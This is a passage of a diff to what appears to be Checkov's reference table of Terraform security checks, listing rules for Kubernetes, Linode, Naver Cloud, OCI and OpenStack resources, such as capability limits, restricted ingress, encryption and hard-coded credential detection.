+| 1935 | CKV_K8S_28 | resource | kubernetes_pod_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
+| 1936 | CKV_K8S_29 | resource | kubernetes_daemon_set_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 1937 | CKV_K8S_29 | resource | kubernetes_daemonset | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 1938 | CKV_K8S_29 | resource | kubernetes_deployment | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 1939 | CKV_K8S_29 | resource | kubernetes_deployment_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 1940 | CKV_K8S_29 | resource | kubernetes_pod | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 1941 | CKV_K8S_29 | resource | kubernetes_pod_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
+| 1942 | CKV_K8S_30 | resource | kubernetes_deployment | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
+| 1943 | CKV_K8S_30 | resource | kubernetes_deployment_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
+| 1944 | CKV_K8S_30 | resource | kubernetes_pod | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
+| 1945 | CKV_K8S_30 | resource | kubernetes_pod_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
+| 1946 | CKV_K8S_32 | resource | kubernetes_pod_security_policy | Ensure default seccomp profile set to docker/default or runtime/default | Terraform | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SeccompPSP.py) |
+| 1947 | CKV_K8S_34 | resource | kubernetes_deployment | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) |
+| 1948 | CKV_K8S_34 | resource | kubernetes_deployment_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) |
+| 1949 | CKV_K8S_34 | resource | kubernetes_pod | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) |
+| 1950 | CKV_K8S_34 | resource | kubernetes_pod_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) |
+| 1951 | CKV_K8S_35 | resource | kubernetes_deployment | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) |
+| 1952 | CKV_K8S_35 | resource | kubernetes_deployment_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) |
+| 1953 | CKV_K8S_35 | resource | kubernetes_pod | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) |
+| 1954 | CKV_K8S_35 | resource | kubernetes_pod_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) |
+| 1955 | CKV_K8S_36 | resource | kubernetes_pod_security_policy | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py) |
+| 1956 | CKV_K8S_37 | resource | kubernetes_deployment | Minimise the 
admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 1957 | CKV_K8S_37 | resource | kubernetes_deployment_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 1958 | CKV_K8S_37 | resource | kubernetes_pod | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 1959 | CKV_K8S_37 | resource | kubernetes_pod_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 1960 | CKV_K8S_39 | resource | kubernetes_deployment | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 1961 | CKV_K8S_39 | resource | kubernetes_deployment_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 1962 | CKV_K8S_39 | resource | kubernetes_pod | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 1963 | CKV_K8S_39 | resource | kubernetes_pod_v1 | Do not use the CAP_SYS_ADMIN linux capability | 
Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 1964 | CKV_K8S_41 | resource | kubernetes_service_account | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | +| 1965 | CKV_K8S_41 | resource | kubernetes_service_account_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | +| 1966 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 1967 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 1968 | CKV_K8S_42 | resource | kubernetes_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 1969 | CKV_K8S_42 | resource | kubernetes_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 1970 | CKV_K8S_43 | resource | 
kubernetes_deployment | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 1971 | CKV_K8S_43 | resource | kubernetes_deployment_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 1972 | CKV_K8S_43 | resource | kubernetes_pod | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 1973 | CKV_K8S_43 | resource | kubernetes_pod_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 1974 | CKV_K8S_44 | resource | kubernetes_service | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | +| 1975 | CKV_K8S_44 | resource | kubernetes_service_v1 | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | +| 1976 | CKV_K8S_49 | resource | kubernetes_cluster_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 1977 | CKV_K8S_49 | resource | kubernetes_cluster_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 1978 | CKV_K8S_49 | resource | kubernetes_role | Minimize wildcard use in Roles and ClusterRoles | 
Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 1979 | CKV_K8S_49 | resource | kubernetes_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 1980 | CKV_LIN_1 | provider | linode | Ensure no hard coded Linode tokens exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/linode/credentials.py) | +| 1981 | CKV_LIN_2 | resource | linode_instance | Ensure SSH key set in authorized_keys | Terraform | [authorized_keys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/authorized_keys.py) | +| 1982 | CKV_LIN_3 | resource | linode_user | Ensure email is set | Terraform | [user_email_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_email_set.py) | +| 1983 | CKV_LIN_4 | resource | linode_user | Ensure username is set | Terraform | [user_username_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_username_set.py) | +| 1984 | CKV_LIN_5 | resource | linode_firewall | Ensure Inbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_inbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_inbound_policy.py) | +| 1985 | CKV_LIN_6 | resource | linode_firewall | Ensure Outbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_outbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_outbound_policy.py) | +| 1986 | CKV_NCP_1 | resource | ncloud_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | 
[LBTargetGroupDefinesHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupDefinesHealthCheck.py) | +| 1987 | CKV_NCP_2 | resource | ncloud_access_control_group | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | +| 1988 | CKV_NCP_2 | resource | ncloud_access_control_group_rule | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | +| 1989 | CKV_NCP_3 | resource | ncloud_access_control_group_rule | Ensure no security group rules allow outbound traffic to 0.0.0.0/0 | Terraform | [AccessControlGroupOutboundRule.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupOutboundRule.py) | +| 1990 | CKV_NCP_4 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 22 | Terraform | [AccessControlGroupInboundRulePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort22.py) | +| 1991 | CKV_NCP_5 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [AccessControlGroupInboundRulePort3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort3389.py) | +| 1992 | CKV_NCP_6 | resource | ncloud_server | Ensure Server instance is encrypted. 
| Terraform | [ServerEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerEncryptionVPC.py) | +| 1993 | CKV_NCP_7 | resource | ncloud_launch_configuration | Ensure Basic Block storage is encrypted. | Terraform | [LaunchConfigurationEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LaunchConfigurationEncryptionVPC.py) | +| 1994 | CKV_NCP_8 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 20 | Terraform | [NACLInbound20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound20.py) | +| 1995 | CKV_NCP_9 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 21 | Terraform | [NACLInbound21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound21.py) | +| 1996 | CKV_NCP_10 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 22 | Terraform | [NACLInbound22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound22.py) | +| 1997 | CKV_NCP_11 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [NACLInbound3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound3389.py) | +| 1998 | CKV_NCP_12 | resource | ncloud_network_acl_rule | An inbound Network ACL rule should not allow ALL ports. 
| Terraform | [NACLPortCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLPortCheck.py) | +| 1999 | CKV_NCP_13 | resource | ncloud_lb_listener | Ensure LB Listener uses only secure protocols | Terraform | [LBListenerUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsesSecureProtocols.py) | +| 2000 | CKV_NCP_14 | resource | ncloud_nas_volume | Ensure NAS is securely encrypted | Terraform | [NASEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NASEncryptionEnabled.py) | +| 2001 | CKV_NCP_15 | resource | ncloud_lb_target_group | Ensure Load Balancer Target Group is not using HTTP | Terraform | [LBTargetGroupUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupUsingHTTPS.py) | +| 2002 | CKV_NCP_16 | resource | ncloud_lb | Ensure Load Balancer isn't exposed to the internet | Terraform | [LBNetworkPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBNetworkPrivate.py) | +| 2003 | CKV_NCP_18 | resource | ncloud_auto_scaling_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | +| 2004 | CKV_NCP_18 | resource | ncloud_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. 
| Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | +| 2005 | CKV_NCP_19 | resource | ncloud_nks_cluster | Ensure Naver Kubernetes Service public endpoint disabled | Terraform | [NKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSPublicAccess.py) | +| 2006 | CKV_NCP_20 | resource | ncloud_route | Ensure Routing Table associated with Web tier subnet have the default route (0.0.0.0/0) defined to allow connectivity | Terraform | [RouteTableNATGatewayDefault.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/RouteTableNATGatewayDefault.py) | +| 2007 | CKV_NCP_22 | resource | ncloud_nks_cluster | Ensure NKS control plane logging enabled for all log types | Terraform | [NKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSControlPlaneLogging.py) | +| 2008 | CKV_NCP_22 | resource | ncloud_route_table | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | +| 2009 | CKV_NCP_22 | resource | ncloud_subnet | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | +| 2010 | CKV_NCP_23 | resource | ncloud_public_ip | Ensure Server instance should not have public IP. 
| Terraform | [ServerPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerPublicIP.py) | +| 2011 | CKV_NCP_24 | resource | ncloud_lb_listener | Ensure Load Balancer Listener Using HTTPS | Terraform | [LBListenerUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsingHTTPS.py) | +| 2012 | CKV_NCP_25 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 80 | Terraform | [AccessControlGroupInboundRulePort80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort80.py) | +| 2013 | CKV_NCP_26 | resource | ncloud_access_control_group | Ensure Access Control Group has Access Control Group Rule attached | Terraform | [AccessControlGroupRuleDefine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AccessControlGroupRuleDefine.yaml) | +| 2014 | CKV_OCI_1 | provider | oci | Ensure no hard coded OCI private key in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/oci/credentials.py) | +| 2015 | CKV_OCI_2 | resource | oci_core_volume | Ensure OCI Block Storage Block Volume has backup enabled | Terraform | [StorageBlockBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py) | +| 2016 | CKV_OCI_3 | resource | oci_core_volume | OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK) | Terraform | [StorageBlockEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py) | +| 2017 | CKV_OCI_4 | resource | oci_core_instance | Ensure OCI Compute Instance boot volume has in-transit data encryption enabled | Terraform | 
[InstanceBootVolumeIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py) | +| 2018 | CKV_OCI_5 | resource | oci_core_instance | Ensure OCI Compute Instance has Legacy MetaData service endpoint disabled | Terraform | [InstanceMetadataServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py) | +| 2019 | CKV_OCI_6 | resource | oci_core_instance | Ensure OCI Compute Instance has monitoring enabled | Terraform | [InstanceMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py) | +| 2020 | CKV_OCI_7 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage bucket can emit object events | Terraform | [ObjectStorageEmitEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py) | +| 2021 | CKV_OCI_8 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage has versioning enabled | Terraform | [ObjectStorageVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py) | +| 2022 | CKV_OCI_9 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is encrypted with Customer Managed Key | Terraform | [ObjectStorageEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py) | +| 2023 | CKV_OCI_10 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is not Public | Terraform | [ObjectStoragePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py) | +| 2024 | CKV_OCI_11 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain lower case | Terraform | 
[IAMPasswordPolicyLowerCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py) | +| 2025 | CKV_OCI_12 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Numeric characters | Terraform | [IAMPasswordPolicyNumeric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py) | +| 2026 | CKV_OCI_13 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Special characters | Terraform | [IAMPasswordPolicySpecialCharacters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py) | +| 2027 | CKV_OCI_14 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Uppercase characters | Terraform | [IAMPasswordPolicyUpperCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py) | +| 2028 | CKV_OCI_15 | resource | oci_file_storage_file_system | Ensure OCI File System is Encrypted with a customer Managed Key | Terraform | [FileSystemEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/FileSystemEncryption.py) | +| 2029 | CKV_OCI_16 | resource | oci_core_security_list | Ensure VCN has an inbound security list | Terraform | [SecurityListIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngress.py) | +| 2030 | CKV_OCI_17 | resource | oci_core_security_list | Ensure VCN inbound security lists are stateless | Terraform | [SecurityListIngressStateless.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py) | +| 2031 | CKV_OCI_18 | resource | oci_identity_authentication_policy | OCI IAM password policy for local (non-federated) users has 
a minimum length of 14 characters | Terraform | [IAMPasswordLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordLength.py) | +| 2032 | CKV_OCI_19 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 22. | Terraform | [SecurityListUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py) | +| 2033 | CKV_OCI_20 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 3389. | Terraform | [SecurityListUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py) | +| 2034 | CKV_OCI_21 | resource | oci_core_network_security_group_security_rule | Ensure security group has stateless ingress security rules | Terraform | [SecurityGroupsIngressStatelessSecurityRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityGroupsIngressStatelessSecurityRules.py) | +| 2035 | CKV_OCI_22 | resource | oci_core_network_security_group_security_rule | Ensure no security groups rules allow ingress from 0.0.0.0/0 to port 22 | Terraform | [AbsSecurityGroupUnrestrictedIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py) | +| 2036 | CKV2_OCI_1 | resource | oci_identity_group | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | +| 2037 | CKV2_OCI_1 | resource | oci_identity_user | Ensure administrator users are not associated with API keys | Terraform | 
[AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | +| 2038 | CKV2_OCI_1 | resource | oci_identity_user_group_membership | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | +| 2039 | CKV2_OCI_2 | resource | oci_core_network_security_group_security_rule | Ensure NSG does not allow all traffic on RDP port (3389) | Terraform | [OCI_NSGNotAllowRDP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NSGNotAllowRDP.yaml) | +| 2040 | CKV2_OCI_3 | resource | oci_containerengine_cluster | Ensure Kubernetes engine cluster is configured with NSG(s) | Terraform | [OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml) | +| 2041 | CKV2_OCI_4 | resource | oci_file_storage_export | Ensure File Storage File System access is restricted to root users | Terraform | [OCI_NFSaccessRestrictedToRootUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NFSaccessRestrictedToRootUsers.yaml) | +| 2042 | CKV2_OCI_5 | resource | oci_containerengine_node_pool | Ensure Kubernetes Engine Cluster boot volume is configured with in-transit data encryption | Terraform | [OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml) | +| 2043 | CKV2_OCI_6 | resource | oci_containerengine_cluster | Ensure Kubernetes Engine Cluster pod security policy is enforced | 
Terraform | [OCI_K8EngineClusterPodSecPolicyEnforced.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterPodSecPolicyEnforced.yaml) | +| 2044 | CKV_OPENSTACK_1 | provider | openstack | Ensure no hard coded OpenStack password, token, or application_credential_secret exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/openstack/credentials.py) | +| 2045 | CKV_OPENSTACK_2 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | +| 2046 | CKV_OPENSTACK_2 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | +| 2047 | CKV_OPENSTACK_3 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | 